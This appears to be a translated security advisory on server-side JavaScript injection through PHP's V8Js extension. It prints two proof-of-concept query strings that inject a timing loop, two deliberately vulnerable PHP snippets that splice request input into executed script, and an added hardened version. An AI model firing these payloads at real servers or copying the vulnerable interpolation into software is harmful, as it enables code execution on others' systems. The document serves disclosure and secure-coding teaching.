Release date:
Updated on:
Affected Systems:
Google V8 JavaScript Engine
Description:
--------------------------------------------------------------------------------
Chromium is an open source Web browser project. V8 is Google's open-source JavaScript Engine.
Server-side use of Google's V8 engine is affected by a server-side JavaScript (SSJS) injection vulnerability. Through this JavaScript injection vulnerability, an attacker can inject arbitrary code that is executed on the server from PHP.
<* Source: Felipe Aragon (felipe@syhunt.com)
Link: http://packetstormsecurity.org/files/110210/Google-V8-Server-Side-Javascript-Injection.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
vulnerable.php?msg=A';d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo='bar
Vulnerable Code:
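// Attacker-controlled query parameter, used without any encoding.
$msg = $_GET['msg'];
$v8 = new V8Js();
// $msg is interpolated straight into the JavaScript source string.
$v8->executeString("var msg = '$msg';... some code ..");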
vulnerable.php?msg=version();d%20=%20new%20Date();do{cd=new%20Date();}while(cd-d<10000);foo=('bar'
Vulnerable Code:
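$msg = $_GET['msg'];
$v8 = new V8Js();
// Heredoc: PHP interpolates $msg into the script as code, not as a string.
// "\\n" keeps a \n escape in the JavaScript source instead of a raw line break.
$JS = <<<EOT
len = print($msg + "\\n");
... some code ..
EOT;
$v8->executeString($JS, 'basic.js');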
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Google
------
Currently, the vendor does not provide patches or upgrades. We recommend that users of the software check the vendor's homepage to obtain the latest version:
http://www.google.com
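
Added example (not part of the original advisory and not code from the V8Js project): a hardened form of the two vulnerable snippets above, passing msg to the script as data instead of splicing it into the JavaScript source. The helper name js_string_literal is hypothetical, and the code assumes the V8Js PHP extension with its default "PHP" object name and PHP 7.3 or later.

```php
<?php
// Added example, not code from the advisory or from the V8Js project.
declare(strict_types=1);

/**
 * Hypothetical helper: encode an untrusted string as a JavaScript string
 * literal. json_encode() escapes quotes, backslashes and control characters,
 * and by default writes every non-ASCII character as \uXXXX, so the value
 * cannot terminate the literal it is placed in.
 */
function js_string_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Reject array input such as ?msg[]=x instead of casting it to a string.
$msg = $_GET['msg'] ?? '';
if (!is_string($msg)) {
    http_response_code(400);
    exit('msg must be a string');
}

$v8 = new V8Js();

// Option 1: bind the value as a property of the V8Js object. The script text
// is a constant; JavaScript reads the value through the default "PHP" object.
$v8->msg = $msg;
$v8->executeString('var msg = PHP.msg; len = print(msg + "\n");', 'basic.js');

// Option 2: if the value must appear in the source, emit it as an encoded
// literal. Nowdoc (<<<'EOT') is used so PHP interpolates nothing by itself.
$template = <<<'EOT'
var msg = %s;
len = print(msg + "\n");
EOT;
try {
    $v8->executeString(sprintf($template, js_string_literal($msg)), 'basic.js');
} catch (JsonException $e) {
    // Invalid UTF-8 in msg: refuse rather than run a partial script.
    http_response_code(400);
    exit('msg is not valid UTF-8');
}
```

With either option the two test requests above reach the script as an ordinary string value, so the Date() loop is printed rather than executed.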